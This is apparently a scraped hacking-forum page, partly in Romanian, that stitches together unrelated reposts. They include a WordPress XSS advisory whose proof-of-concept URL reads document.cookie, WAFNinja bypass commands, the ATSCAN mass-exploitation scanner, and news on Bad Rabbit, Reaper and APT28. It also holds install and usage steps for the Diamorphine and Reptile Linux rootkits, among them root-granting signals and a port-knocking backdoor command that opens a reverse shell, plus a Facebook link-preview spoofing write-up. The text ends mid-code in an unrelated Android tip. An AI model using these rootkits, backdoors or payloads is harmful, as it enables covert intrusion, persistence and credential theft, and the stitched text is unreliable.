Fi8sVrs

poate te vad

Phishruffus - Intelligent threat hunter and phishing servers Phishruffus is a tool designed for the identification of DNS servers and Internet threats used for the illegal practice of phishing. https://lab.insightsecurity.com.br/phishruffus-intelligent-threat-hunter-and-phishing-servers/ Usage: ./phishruffus.py --listdns dns_servers.txt --timeout 5 Example: https://asciinema.org/a/144460 Download: Phishruffus-master.zip or: git clone https://github.com/jh00nbr/Phishruffus.git Mirror: phishruffus.py requirements.txt dnspython==1.15.0 requests==2.18.4 Sources: https://github.com/jh00nbr/Phishruffus https://lab.insightsecurity.com.br/phishruffus-intelligent-threat-hunter-and-phishing-servers/

https://deals.thehackernews.com/free Free Free: 1-Month of Any SaneBox Subscription FREE $36 Free Free eBook: How To Build a Career in Tech FREE Free Free: $10 Off Puls Phone Repair and TV Mounting FREE Free Free: Learn to Code Course + Free Trial for Any GoGoTraining Course FREE $95 Free Free: 20% Off Coupon for Grammarly Premium FREE $29.95 Free Free: 30-Day Premium Membership to Shaw Academy FREE $49.95 Free Free: 20% Off Lensabl Lenses FREE Free Free: 2 FREE Audiobooks and 30-Day Audible Trial Membership FREE $30 Free Free: TMAC Fitness: 1-Month Membership FREE $14.95 Free Free: Perfect Privacy VPN 30 Day Trial FREE $14.99 Free Free: HTML5 Game Development by Example FREE $200 Free Free Bottle of Wine From Wine Awesomeness with Membership FREE $15 Free Home Chef: $30 Off First Purchase FREE Free Free: Robinhood Stock Trading + 1 Free Share of Stock FREE $65 Free Free: Ultimate Coding Bundle FREE $737 Free Free: Latigo Coffee 6oz Bag of Coffee FREE $10 Free Free: Watermark Software FREE $24.95 Free Free: Arcadia Power Clean Energy Membership FREE Free Free: Byte-Sized-Chunks: CSS with HTML FREE $49 Free Free: Instagram iOS App: Photo Sharing on iOS FREE Free Free: Chinese Made Easy: An Exciting Start to Chinese FREE Free Free: Premium Coding Bundle FREE $120 Free Free: Byte-Sized-Chunks: Decision Trees and Random Forests FREE $69 Free Free: WishList Member & WordPress: Create a Membership Site FREE $49 Free Free: WordPress Freelancing 101 FREE $49 Free Free: Beachbody On-Demand Exclusive 30-Day Trial FREE Free Free: All-About-Android Coding Bundle FREE $95 Free Free: 1-Month of Dashlane Premium FREE $39.99 Free Free: Mighty Mac App Bundle FREE $130.75 Free Free: Logo Design by PM Logos FREE $75 Free Free: 'The 4-Hour Chef' Audiobook FREE $20

WordPress User Login History plugin version 1.5.2 suffers from a cross site scripting vulnerability. Product: User Login History Wordpress Plugin - https://wordpress.org/plugins/user-login-history/ Vendor: Er Faiyaz Alam Tested version: 1.5.2 CVE ID: CVE-2017-15867 ** CVE description ** Multiple cross-site scripting (XSS) vulnerabilities in the user-login-history plugin through 1.5.2 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) date_from, (2) date_to, (3) user_id, (4) username, (5) country_name, (6) browser, (7) operating_system, or (8) ip_address parameter to admin/partials/listing/listing.php. ** Technical details ** The above-mentioned HTTP GET parameters are directly put into the value attribute of an HTML form field without proper sanitization. An attacker can close the HTML input tag with the "> (%22%3E) expression and inject arbitrary HTML/JavaScript code. Example of the vulnerable code with the date_from parameter (line 21): <td><input readonly="readonly" autocomplete="off" placeholder="<?php _e("From", "user-login-history") ?>" id="date_from" name="date_from" value="<?php echo isset($_GET['date_from']) ? $_GET['date_from'] : "" ?>" class="textfield-bg"></td> ** Proof of Concept ** Example using the user_id parameter: http://<host>/wordpress/wp-admin/admin.php?page=user-login-history&user_id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E ** Solution ** Update to version 1.6. ** Timeline ** 15/10/2017: vendor contacted 15/10/2017: vendor acknowledgment 18/10/2017: fix pushed to GitHub 30/10/2017: fixed release available on WordPress Plugins Store. ** Credits ** Vulnerability discovered by Nicolas Buzy-Debat working at Orange Cyberdefense Singapore (CERT-LEXSI). ** References ** - WordPress-plugin-user-login-history GitHub : error log and xss and some minor improvements https://github.com/faiyazalam/WordPress-plugin-user-login-history/commit/519341a7dece59e2c589b908a636e6cf12a61741 -- Best Regards, Nicolas Buzy-Debat Orange Cyberdefense Singapore (CERT-LEXSI) _________________________________________________________________________________________________________________________ Ce message et ses pieces jointes peuvent contenir des informations confidentielles ou privilegiees et ne doivent donc pas etre diffuses, exploites ou copies sans autorisation. Si vous avez recu ce message par erreur, veuillez le signaler a l'expediteur et le detruire ainsi que les pieces jointes. Les messages electroniques etant susceptibles d'alteration, Orange decline toute responsabilite si ce message a ete altere, deforme ou falsifie. Merci. This message and its attachments may contain confidential or privileged information that may be protected by law; they should not be distributed, used or copied without authorisation. If you have received this email in error, please notify the sender and delete this message and its attachments. As emails may be altered, Orange is not liable for messages that have been modified, changed or falsified. Thank you. # 0day.today [2017-11-01] # Source: 0day.today

WAFNinja WAFNinja - Penetration testers favorite for WAF Bypassing WAFNinja is a CLI tool written in Python. It shall help penetration testers to bypass a WAF by automating steps necessary for bypassing input validation. The tool was created with the objective to be easily extendible, simple to use and usable in a team environment. Many payloads and fuzzing strings, which are stored in a local database file come shipped with the tool. WAFNinja supports HTTP connections, GET and POST requests and the use of Cookies in order to access pages restricted to authenticated users. Also, an intercepting proxy can be set up. Usage wafninja.py [-h] [-v] {fuzz, bypass, insert-fuzz, insert-bypass, set-db} ... EXAMPLE: fuzz: python wafninja.py fuzz -u "http://www.target.com/index.php?id=FUZZ" -c "phpsessid=value" -t xss -o output.html bypass: python wafninja.py bypass -u "http://www.target.com/index.php" -p "Name=PAYLOAD&Submit=Submit" -c "phpsessid=value" -t xss -o output.html insert-fuzz: python wafninja.py insert-fuzz -i select -e select -t sql positional arguments: {fuzz, bypass, insert-fuzz, insert-bypass, set-db} Which function do you want to use? fuzz check which symbols and keywords are allowed by the WAF. bypass sends payloads from the database to the target. insert-fuzz add a fuzzing string insert-bypass add a payload to the bypass list set-db use another database file. Useful to share the same database with others. optional arguments: -h, --help show this help message and exit -v, --version show program's version number and exit I would appreciate any feedback! Cheers, Khalil. Download: WAFNinja-master.zip or git clone https://github.com/khalilbijjou/WAFNinja.git Source: https://github.com/khalilbijjou/WAFNinja

SQL-injection security hole needs patching ASAP Updated WordPress has a security patch out for a programming blunder that you should apply ASAP. The fix addresses a flaw that can be potentially exploited by hackers to hijack and take over WordPress-powered websites, by injecting malicious SQL database commands. The core installation of WordPress is not directly affected, we're told, rather the bug is in a security function provided by the core to plugins and themes. In other words, a bug in the core leaves plugins and themes potentially at risk of being hacked, leading to whole sites being commandeered by miscreants. Also, crafting a patch to the address the blunder without breaking tons of add-ons for WordPress turned out to be problematic, delaying the release of "WordPress versions 4.8.2 and earlier are affected by an issue where $wpdb->prepare() can create unexpected and unsafe queries leading to potential SQL injection (SQLi)," the official advisory today warned. "WordPress core is not directly vulnerable to this issue, but we’ve added hardening to prevent plugins and themes from accidentally causing a vulnerability." According to the flaw's finder, Anthony Ferrara, VP of engineering at Lingo Live, WordPress 4.8.2 was released last month in an attempt to shore up its $wpdb->prepare() code, but that update was shoddy. As well as not fully addressing the underlying flaw, the update also broke "a metric ton of third-party code and sites – an estimated 1.2 million lines of code affected," Ferrara said. Ferrara immediately warned the WordPress team that the 4.8.2 patch was insufficient and liable to break add-ons for the software; we're told the project initially refused to take him seriously. It only backed down – and prepared a better fix that doesn't break everything, aka version 4.8.3 – when he provided proof-of-concept exploit code for the lingering hole, and threatened to go public, all according to Ferrara. "One of our struggles here, as it often is in security, is how to secure things while also breaking as little as possible," Ferrara quoted the WordPress team as saying. While the veep acknowledged that many of the people working on WordPress are volunteers, he expressed frustration at the group's attitude towards security. However, he remains hopeful that the project will get better at responding faster to reports of exploitable holes in the codebase. "It took literally five weeks to even get someone to consider the actual vulnerability," Ferrara said. "From there, it took me publicly threatening full disclosure to get the team to acknowledge the full scope of the issue, though they did start to engage deeper prior to the full disclosure threat. I was disappointed for a good part of the past six weeks. I’m now cautiously hopeful." You can find more technical details on the vulnerability, here. In any case, make sure you install or upgrade to version 4.8.3 on your websites to avoid being hacked via your plugins and themes. ® Updated to add Ferrara has been in touch to say he disputes that the WordPress core is not directly affected, as the open-source project described. The core contains the buggy code, he insists. "I disagree that core was not vulnerable," he told us. "The original proof-of-concept I shared with them was against core. Two queries in core are exploitable, though they require editor privileges." As we understand it, the WordPress core SQL string escape code was flawed, but was accessible to site visitors only via plugins and tools. Ferrara reckons logged-in editors could also access the vulnerable functionality. In any case, just patch and move on. Via theregister.co.uk

Diamorphine Diamorphine is a LKM rootkit for Linux Kernels 2.6.x/3.x/4.x Features When loaded, the module starts invisible; Hide/unhide any process by sending a signal 31; Sending a signal 63(to any pid) makes the module become (in)visible; Sending a signal 64(to any pid) makes the given user become root; Files or directories starting with the MAGIC_PREFIX become invisble; Source: https://github.com/m0nad/Diamorphine Install Verify if the kernel is 2.6.x/3.x/4.x uname -r Clone the repository git clone https://github.com/m0nad/Diamorphine Enter the folder cd Diamorphine Compile make Load the module(as root) insmod diamorphine.ko Uninstall The module starts invisible, to remove you need to make its visible kill -63 0 Then remove the module(as root) rmmod diamorphine References Wikipedia Rootkit https://en.wikipedia.org/wiki/Rootkit Linux Device Drivers http://lwn.net/Kernel/LDD3/ LKM HACKING https://www.thc.org/papers/LKM_HACKING.html Memset's blog http://memset.wordpress.com/ Linux on-the-fly kernel patching without LKM http://phrack.org/issues/58/7.html WRITING A SIMPLE ROOTKIT FOR LINUX http://big-daddy.fr/repository/Documentation/Hacking/Security/Malware/Rootkits/writing-rootkit.txt Linux Cross Reference http://lxr.free-electrons.com/ Mirror: Makefile - pushing the code diamorphine.c - 'sys_call_table' symbol conflicts with a previous declaration diamorphine.h - remove useless code/comment Source: https://github.com/m0nad/Diamorphine

@razzy4realbiz Telegram reported to block this tool from github, have mirror here Files: Download: https://www.sendspace.com/file/wdww7x

ATSCAN SCANNER Advanced Search / Dork / Mass Exploitation Scanner [!] LEGAL DISCLAIMER: Alisam Technology is not responsible for any misuse, damage caused by this script or attacking targets without prior mutual consent! It is your responsibility to obey laws! Tool: ATSCAN V 12.4.4 Codename: 4n0n4t AUTHOR: Ali MEHDIOUI GROUP: Alisam Technology FACE: facebook.com/Alisam.Technology YOUTUBE: youtube.com/c/AlisamTechnology TWITTER: twitter.com/AlisamTechno PLUS: plus.google.com/+AlisamTechnology ★ Description: ● Search engine Google / Bing / Ask / Yandex / Sogou ● Mass Dork Search ● Multiple instant scans. ● Mass Exploitation ● Use proxy. ● Random user agent. ● Random engine. ● Extern commands execution. ● XSS / SQLI / LFI / AFD scanner. ● Filter wordpress and Joomla sites. ● Find Admin page. ● Decode / Encode Base64 / MD5 ● Ports scan. ● Collect IPs ● Collect E-mails. ● Auto detect errors. ● Auto detect Cms. ● Post data. ● Auto sequence repeater. ● Validation. ● Post and Get method ● Interactive and Normal interface. ● And more... ★ Libreries to install: Perl Required. Works in all platforms. Disponible in Blackarch linux and Dracos systems. ★ Download: ● git clone https://github.com/AlisamTechnology/ATSCAN ● direct link: https://github.com/AlisamTechnology/ATSCAN ★ Permissions: cd ATSCAN chmod +x ./atscan.pl ★ Installation: chmod +x ./install.sh ./install.sh ★ Execution: Portable Execution: perl ./atscan.pl Installed Tool Execution: atscan Menu: Applications > Web Application analysis > atscan ★ Uninstall Tool: atscan --uninstall ★ Screenshots: Source: https://github.com/AlisamTechnology/ATSCAN

Awesome Hacking Resources A collection of hacking / penetration testing resources to make you better! Let's make it the biggest resource repository for our community. You are welcome to fork and contribute. We started a new tools list, come and contribute Table of Contents Learning the Skills YouTube Channels Companies Conferences NEWS Sharpening Your Skills Reverse Engineering, Buffer Overflow and Exploit Development Privilege Escalation Network Scanning / Reconnaissance Malware Analysis Vulnerable Web Application Vulnerable OS Exploits Forums Archived Security Conference Videos Online Communities Online News Sources Linux Penetration Testing OS Learning the Skills Free interactive labs with White Hat Academy Learning Exploitation with Offensive Computer Security 2.0 Cybrary OffensiveComputerSecurity CS 642: Intro to Computer Security Free cyber security training SecurityTube Seed Labs Hak5 OWASP top 10 web security risks MIT OCW 6.858 Computer Systems Security YouTube Channels OWASP Hak5 BlackHat Christiaan008 Companies 0patch by ACROS Security Detectify Kaspersky Lab Metasploit OpenNSM Rapid7 Securelist Segment Security SocialEngineerOrg Sonatype SophosLabs Sourcefire Station X Synack TippingPoint Zero Day Initiative Tripwire, Inc. Vincent Yiu nVisium ntop Conferences 44contv BruCON Security Conference BSides Manchester BSidesAugusta CarolinaCon Cort Johnson DevSecCon Garage4Hackers - Information Security HACKADAY Hack In The Box Security Conference Hack in Paris Hacklu Hacktivity Hardwear.io IEEE Symposium on Security and Privacy LASCON Marcus Niemietz Media.ccc.de NorthSec Pancake Nopcode Psiinon SJSU Infosec Secappdev.org Security Fest SecurityTubeCons ToorCon USENIX Enigma Conference NEWS Corey Nachreiner Error 404 Cyber News Latest Hacking News Pentester Academy TV SecureNinjaTV Troy Hunt Samy Kamkar's Applied Hacking danooct1 DedSec DEFCON Conference DemmSec Don Does 30 Geeks Fort - KIF iExplo1t HACKING TUTORIALS LiveOverflow Metasploitation NetSecNow Open SecurityTraining BalCCon - Balkan Computer Congress Penetration Testing in Linux rwbnetsec Security Weekly Seytonic Shozab Haxor SSTec Tutorials Waleed Jutt webpwnized JackkTutorials Zer0Mem0ry LionSec Adrian Crenshaw HackerSploit Derek Rook - CTF/Boot2root/wargames Walkthrough Sharpening Your Skills OWASP Security Shepherd CTFLearn CTFs write-ups CTF365 Pentestit Hacksplaining The cryptopals crypto challenges The enigma group Ringzer0 Team Hack The Box Over the wire Backdoor Vulnhub Hack.me Hack this site! Exploit exercises PentesterLab SmashTheStack Root-Me PicoCTF Shellter Labs Pentest Practice Pentest.training pwnable.kr pwnable.tw hackburger.ee http://noe.systems/ Hacker Gateway Solve Me Challenge Land Participating Challenge Sites Hacker test Crackmes.de Archive (2011-2015) ROP Emporium Google's XSS game Reverse Engineering, Buffer Overflow and Exploit Development Shell storm Buffer Overflow Exploitation Megaprimer for Linux Reverse Engineering Malware 101 Reverse Engineering Malware 102 Modern Binary Exploitation - CSCI 4968 Introductory Intel x86 Binary hacking Shellcode Injection Reverse Engineering for Beginners Exploit tutorials Exploit development Corelan tutorials Reverse engineering reading list Reverse Engineering challenges Reverse Engineering for beginners (GitHub project) reversing.kr challenges Analysis and exploitation (unprivileged) A Course on Intermediate Level Linux Exploitation Lena's Reversing for Newbies (Complete) Megabeets journey into Radare2 [Introduction to ARM Assembly Basics] ( https://azeria-labs.com/writing-arm-assembly-part-1/ ) Linux (x86) Exploit Development Series Privilege Escalation Reach the root Basic linux privilege escalation Windows Privilege Escalation Privilege escalation for Windows and Linux Windows Privilege Escalation Fundamentals RootHelper Windows exploits, mostly precompiled. Unix privesc checker Privilege escalation linux with live example Windows privilege escalation checker Linux Privilege Escalation Scripts AutoLocalPrivilegeEscalation Linux Privilege Escalation Check Script Local Linux Enumeration & Privilege Escalation Cheatsheet 4 Ways get linux privilege escalation Malware Analysis Malware traffic analysis Malware Analysis - CSCI 4976 Network Scanning / Reconnaissance Foot Printing with WhoIS/DNS records Google Dorks/Google Hacking Vulnerable Web Application OWASP Hackademic Challenges project bWAPP Damn Vulnerable Web Application (DVWA) Xtreme Vulnerable Web Application (XVWA) WebGoat: A deliberately insecure Web Application OWASP Mutillidae II OWASP Broken Web Applications Project Damn Small Vulnerable Web OWASP Juice Shop Google Gruyere Vulnerable OS Metasploitable2 (Linux) Metasploitable3 [Installation] Vulnhub General Test Environment Guidance Linux Penetration Testing OS BackBox BlackArch Kali LionSec Linux Parrot Bugtraq Exploits Exploit Database CXsecurity 0day.today Snyk Vulnerability DB Forums Greysec Hackforums 0x00sec Antichat EAST Exploit database Archived Security Conference Videos InfoCon.org Irongeek Online Communities Hack+ MPGH Hacktoday Online News Sources Recent Hash Leaks InfoSec Threatpost Security Intell The Hacker News Source: https://github.com/vitalysim/Awesome-Hacking-Resources

About 50% of sites in the web are powered by Content Management Systems, and that trend is growing. Integrating Progressive Technologies into the workflow of platforms such as WordPress and other CMSes is of paramount importance for ensuring that users get an awesome experience in these environments. Surma and Dan Walmsley discuss the challenges involved in the integration of progressive technologies with CMSes in general and WordPress in particular, and presents a working proof of concept of how such an integration would work in the context of WordPress. Check out the code here: https://github.com/GoogleChromeLabs/progressivewordpress Check out the rest of the Chrome Dev Summit videos here: https://goo.gl/ekCoVu Subscribe to the Google Chrome Developers channel: http://goo.gl/LLLNvf

Author: Barak Tawily While we are on Facebook, we are often share links to external sources, like Youtube, Google Drive, Instagram, or any other websites. Many people think that Facebook links are quite reliable, but are they? Facebook users can send those links via post or privately over Messenger, as you can see on the following images: So how exactly preview link feature works? When a user is about to post a link, he pastes it on Facebook, which detects it as a URL, then Facebook bot called “Facebook External Hit”, fetches a GET request to the supplied link and extract the relevant data from the HTML content such as preview image, title, description, and origin domain. The link’s preview data is the only information supplied to the user before clicking it. In case the preview data is fake, it is super useful for phishing campaigns/ads/click fraud (pay-per-click)/Malvertising, just few days ago, I read this article about gigantic ad fraud on MySpace. So after exploring this feature, I managed to understand how exactly the preview data was fetched, and what Facebook bot is looking for in the HTML content. Facebook’s bot is looking for specific HTML tags, some of the tags it is looking for, are the “meta” tags, specifically with values “og:url” , “og:image” and “og:title” in the “property” attribute. Due to lack of validation between the “og:url” content attribute to the origin domain retuned the HTML, it is possible to abuse this feature via crafted meta tags, so in case someone supplies to Facebook bot a URL that returns HTML with those crafted tags which contain fake data of another website (let’s say Youtube), the preview data will look like a Youtube song (or any other targeted page over the internet), but the actual link will lead victims to the URL containing the malicious HTML. An example of HTML that fakes Youtube song link: In my opinion, all Facebook users think that preview data shown by facebook is reliable, and will click the links they are interested in, which makes them easily targeted by attackers that abuse this feature in order to perform several types of attacks as I mentioned above (phishing campaigns/ads/click fraud pay-per-click). I reported Facebook about this issue but unfortunately they refuse to recognize it as security issue and replied: In addition, Facebook replied that the links posted are validated via system called “Linkshim”, in order to avoid phishing and malicious websites, but faking the meta tags is not considered as malicious activity. I explored how Linkshim works, which is probably part of the “Facebook External Hit” bot, I tried to publish a link that redirects user’s browser to “evilzone” but it was detected and removed (as shown the PoC video), then I thought, what if I supply Facebook bot just a normal fake HTML without any malicious code, but supply victims the malicious HTML? PoC video: The following code bypasses Linkshim system by detecting the bot request via User Agent (you can do so via detecting IP) and supply HTML with non malicious content while supplying the malicious HTML to victims: https://pastebin.com/kwc3MJuv mirror: In this article I did not show real-life attack scenario and didn't abused this feature for real malicious activity, but there is plenty ways to exploit this vulnerability in order to perform several types of attacks like stealing sensitive information like credentials/credit cards. In summary, I hope this post will make Facebook users aware of this issue and make Facebook addressed those vulnerabilities. Source: https://baraktawily.blogspot.nl/2017/10/can-you-trust-facebook-links.html

Hashcat is an advanced GPU hash cracking utility that includes the World's fastest md5crypt, phpass, mscash2 and WPA / WPA2 cracker. It also has the first and only GPGPU-based rule engine, focuses on highly iterated modern hashes, single dictionary-based attacks, and more. This is the source code release. Changes: Added support to crack passwords and salts up to length 256. Added option --optimized-kernel-enable to use faster kernels but limit the maximum supported password- and salt-length. Added self-test functionality to detect broken OpenCL runtimes on startup. Various other additions. Download hashcat-4.0.0.tar.gz (3.7 MB) Source

Reptile Reptile is a LKM rootkit for evil purposes. If you are searching stuff only for study purposes, see the demonstration codes. Features Give root to unprivileged users Hide files and directories Hide files contents Hide processes Hide himself Boot persistence Heaven's door - A ICMP/UDP port-knocking backdoor Client to knock on heaven's door Install apt-get install linux-headers-$(uname -r) https://github.com/f0rb1dd3n/Reptile.git cd Reptile ./installer.sh install Usage Binaries will be copied to /reptile folder, that will be hidden by Reptile. Getting root privileges hax@Debian:~$ id uid=1000(hax) gid=1000(hax) grupos=1000(hax),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth),118(scanner) hax@Debian:~$ /reptile/r00t You got super powers! root@Debian:/home/hax# id uid=0(root) gid=0(root) groups=0(root) Hiding Hide/unhide reptile module: kill -50 0 Hide/unhide process: kill -49 <PID> Hide files contents: all content between the tags will be hidden Example: #<reptile> content to hide #</reptile> Knocking on heaven's door Heaven's door is a ICMP/UDP port-knocking backdoor used by Reptile. To access the backdoor you can use the client: Knock Knock on Heaven's Door Writen by: F0rb1dd3n Usage: ./knock_on_heaven <args> -x protocol (ICMP/UDP) -s Source IP address (You can spoof) -t Target IP address -p Source Port -q Target Port -d Data to knock on backdoor: "<key> <reverse IP> <reverse Port>" -l Launch listener [!] ICMP doesn't need ports ICMP: ./knock_on_heaven -x icmp -s 192.168.0.2 -t 192.168.0.3 -d "F0rb1dd3n 192.168.0.4 4444" -l UDP: ./knock_on_heaven -x udp -s 192.168.0.2 -t 192.168.0.3 -p 53 -q 53 -d "F0rb1dd3n 192.168.0.4 4444" -l Disclaimer Some functions of this module is based on another rootkits. Please see the references! References “LKM HACKING”, The Hackers Choice (THC), 1999; https://github.com/m0nad/Diamorphine.git https://github.com/David-Reguera-Garcia-Dreg/enyelkm.git https://github.com/maK-/maK_it-Linux-Rootkit “Abuse of the Linux Kernel for Fun and Profit”, Halflife, Phrack 50, 1997; https://ruinedsec.wordpress.com/2013/04/04/modifying-system-calls-dispatching-linux/ Contribuiting I am open to receiving contributions. If you can contribute with this project, discuss the contribution via e-mail or open an issue, fork the project and make a pull request. I will evaluate pull requests and merge to the project. Download Reptile-master.zip or git clone https://github.com/f0rb1dd3n/Reptile.git Source: https://github.com/f0rb1dd3n/Reptile

Zatarra cred ca se refera la smsglobal.com care acum 4, 5 ani avea versiune trial, limita de 150-200 sms-uri graturite, cu ce optiuni doresti, sender-id, mass send, API etc... acum e cu bani si sunt seriosi, lucreaza cu companii mari , Microsoft, IBM etc.. P.S. posteaza ceva util pe forum pt. informatia asta si nu incerca sa faci înșelăciuni cu ei, din cauza asta au scos trial-ul

Reaper is on track to become one of the largest botnets recorded in recent years — and yet nobody seems to know what it will do or when. But researchers say the damage could be bigger than last year's cyberattack. A little over a month ago, a sizable botnet of infected Internet of Things devices began appearing on the radar of security researchers. Now, just weeks later, it's on track to become one of the largest botnets recorded in recent years. The botnet, dubbed "Reaper" by researchers at Netlab 360, is said to have ensnared almost two million internet-connected webcams, security cameras, and digital video recorders (DVRs) in the past month, says Check Point, which also published research, putting its growth at a far faster pace than Mirai. It was Mirai that caused a massive distributed denial-of-service (DDoS) attack last October, knocking popular websites off the internet for millions of users. The collective bandwidth from the huge number of "zombie devices" that were infected and enslaved was directed at Dyn, an internet infrastructure company, which overloaded the company's systems and prevented millions from accessing popular websites. Mirai was "beautifully simple," said Ken Munro, a consultant at UK-based security firm Pen Test Partners. The malware would scan the internet and infect connected devices with default usernames and passwords, which either weren't or couldn't be changed by the owner. Reaper, however, "is what Mirai could easily have been," said Munro. It takes a slightly different, more advanced approach by quietly targeting and exploiting known vulnerabilities in devices and injecting its malicious code, effectively hijacking the device for whenever the botnet controller is ready to issue their commands. Each time a device is infected, the device spreads the malware to other vulnerable devices -- like a worm. Mirai aggressively ran each device against a list of known usernames and passwords, but Reaper is "not very aggressive," said Netlab. By targeting a known vulnerability, the botnet can swiftly take control of a device without raising any alarms. Netlab said at the time of publishing their research that the botnet was infecting nine known vulnerabilities in D-Link, Netgear, and AVTech products, as well as other device makers. Not only has the botnet gained in size in the past month -- it's growing in capability. New exploits have been added to the botnet's arsenal regularly in recent days, said Netlab. Check Point said 33 devices are vulnerable to attack so far. Researchers have also noted that several known, easy-to-exploit vulnerabilities have not been added to the botnet, raising questions about why some exploits have been added and not others. But what's thrown researchers is that nobody can figure out what the botnet is for. While the Mirai botnet was a point-and-shoot botnet that could be used to hose systems with vast amounts of bandwidth, Reaper can be used to run complex attack scripts on infected devices. Reaper's command and control infrastructure is also growing in size, accommodating more infected devices by the day. Netlab said 10,000 bots were under the wing of just one command and control server. So far, there haven't been any signs of DDoS attacks yet. The botnet creator ("it appears that one group or individual has control of most of it," said Munro), is focusing on building the botnet's size. As it stands, Reaper's size today could be capable of "creating significantly more DDoS traffic than Mirai," said Munro. It's not the first time botnets of a massive scale have crept up on security researchers. Earlier this year, a 300,000-strong botnet appeared almost out of nowhere, but researchers couldn't figure out what it did -- if anything. A breakdown of the Reaper botnet shows that the malware that infects devices allows the botnet owner to remotely execute code on each device, said Alan Woodward, a professor at the University of Surrey. But because each device has such little individual computational power, the code running on each device would have to be harnessed collectively for a larger, coordinated computing task, he said. That could be anything from a DDoS on an internet target, to a much larger kind of attack. What happens next is anybody's guess. There isn't much that consumers or device owners can do, except patch any affected devices they may own and carry out a factory reset. Given that device owners are at the mercy of the manufacturers to release patches -- many of which haven't learned much from the Mirai attack and still don't take security seriously -- many may find that simply pulling the plug on each and every affected device might be the only way to dismantle the botnet. With enough amassed firepower to be larger and stronger than Mirai, the question isn't necessarily what the botnet will do. Source zdnet.com

A new widespread ransomware attack is spreading like wildfire around Europe and has already affected over 200 major organisations, primarily in Russia, Ukraine, Turkey and Germany, in the past few hours. Dubbed "Bad Rabbit," is reportedly a new Petya-like targeted ransomware attack against corporate networks, demanding 0.05 bitcoin (~ $285) as ransom from victims to unlock their systems. According to an initial analysis provided by the Kaspersky, the ransomware was distributed via drive-by download attacks, using fake Adobe Flash players installer to lure victims' in to install malware unwittingly. However, security researchers at ESET have detected Bad Rabbit malware as 'Win32/Diskcoder.D' — a new variant of Petya ransomware, also known as Petrwrap, NotPetya, exPetr and GoldenEye. Bad Rabbit ransomware uses DiskCryptor, an open source full drive encryption software, to encrypt files on infected computers with RSA 2048 keys. ESET believes the new wave of ransomware attack is not using EternalBlue exploit — the leaked SMB vulnerability which was used by WannaCry and Petya ransomware to spread through networks. Instead it first scans internal network for open SMB shares, tries a hardcoded list of commonly used credentials to drop malware, and also uses Mimikatz post-exploitation tool to extract credentials from the affected systems. The ransom note, shown above, asks victims to log into a Tor onion website to make the payment, which displays a countdown of 40 hours before the price of decryption goes up. The affected organisations include Russian news agencies Interfax and Fontanka, payment systems on the Kiev Metro, Odessa International Airport and the Ministry of Infrastructure of Ukraine. Researchers are still analyzing Bad Rabbit ransomware to check if there is a way to decrypt computers without paying ransomware and how to stop it from spreading further. How to Protect Yourself from Ransomware Attacks? Kaspersky suggest to disable WMI service to prevent the malware from spreading over your network. Most ransomware spread through phishing emails, malicious adverts on websites, and third-party apps and programs. So, you should always exercise caution when opening uninvited documents sent over an email and clicking on links inside those documents unless verifying the source to safeguard against such ransomware infection. Also, never download any app from third-party sources, and read reviews even before installing apps from official stores. To always have a tight grip on your valuable data, keep a good backup routine in place that makes their copies to an external storage device that isn't always connected to your PC. Make sure that you run a good and effective anti-virus security suite on your system, and keep it up-to-date. Via thehackernews.com

APT28 threat group is moving fast in the hope that targets haven't yet installed a recently released patch to fix the recently uncovered exploit State-backed hackers are looking to use the exploit before organisations have patched against it. Hackers are rushing to exploit a zero-day Flash vulnerability to plant surveillance software before organisations have time to update their systems to patch the weakness. Uncovered by researchers at Kaspersky Lab on Monday, the CVE-2017-11292 Adobe Flash vulnerability allows attackers to deploy a vulnerability which can lead to code execution on Windows, Mac, Linux, and Chrome OS systems. The exploit enables the delivery of malicious Word documents bundled with malware for example to allows attackers to snoop on communications, eavesdrop on video messages and calls, and steal files. Adobe Flash Player Desktop Runtime, Adobe Flash Player for Google Chrome, Adobe Flash Player for Microsoft Edge, and Internet Explorer 11 are all affected by the vulnerability and organisations are urgently told to install the critical update. As a result, attackers are moving quickly to exploit it while they can and researchers at Proofpoint have attributed a campaign designed to spread trojan malware using the vulnerability to APT28 - also known as Fancy Bear - a Russian hacking group with links to the Kremlin. The campaign to exploit the Flash vulnerability has been sent to government offices in Europe and the US specialising in foreign relations - researchers liken them to "entities equivalent to the State Department" - as well as private businesses in the aerospace industry. The widespread nature of the campaign - compared with other APT28 attacks - is likely an attempt by the attackers to get as much as they can from exploiting the Flash vulnerability before organisations get around to patching it. In this instance, the malicious payload is delivered in a Word document titled "World War 3.docx" which contains text lifted from an article by a UK newspaper on North Korea, first published on Tuesday. The Fancy Bear decoy document used in the campaign. Within the document is 'DealersChoice' an attack framework previously attributed to Russian hackers, which has now been bundled with the Flash vulnerability, in a similar way to which the group has done so with previous campaigns. Once installed on the system, the malware can be used as an effective espionage tool. Researchers found that the exploitation was effective on systems using Windows 7 with Flash 27.0.0.159 and Microsoft Office 2013 and Windows 10 build 1607 with Flash 27.0.0.130 and Microsoft Office 2013. Unlike the previously uncovered campaign exploiting the vulneraliity, Mac OS doesn't seem to be targeted in these attacks. It's therefore critical that the patches are applied in order to protect against these attacks. "APT28 appears to be moving rapidly to exploit this newly documented vulnerability before the available patch is widely deployed," said researchers. "Because Flash is still present on a high percentage of systems and this vulnerability affects all major operating systems, it is critical that organizations and end users apply the Adobe patch immediately," Proofpoint have also warned how other threat actors are likely to follow in attempting to exploit this relatively fresh vulnerability while they still can. Via zdnet.com

There are already many good articles on “How to reduce size of an apk”. My focus in this article will be on “Reuse of resources”. Resources contribute a major chunk in the size of apk. The techniques that I’ll be mentioning here only takes few lines of changes and will save a great deal of space. # Use RotateDrawable resources Many a times, resources are nothing but just a rotated version of some other resource. For e.g. collapse arrow and expand arrow arrow_up.xml can be easily drawn using arrow_down.xml. Create a file named arrow_up.xml in res/drawable folder like this: <?xml version="1.0" encoding="utf-8"?> <rotate xmlns:android="http://schemas.android.com/apk/res/android" android:drawable="@drawable/arrow_down" android:fromDegrees="180" android:pivotX="50%" android:pivotY="50%" android:toDegrees="180" /> res/drawable/arrow_up.xml # Use setColorFilter for resources with different colour versions In this example, three different versions of same icon are used. Instead of using three different icon sets, we can easily use setColorFilter to produce other two icons using the first one. To achieve this, we can create a custom view that extends ImageView and apply color filter in its constructor by passing the desired color in its xml attributes. We’ll need: CustomColorIconView.java — Class that extends ImageView attrs.xml — styleable for color attribute public class CustomColorIconView extends ImageView{ public CustomColorIconView(Context context) { 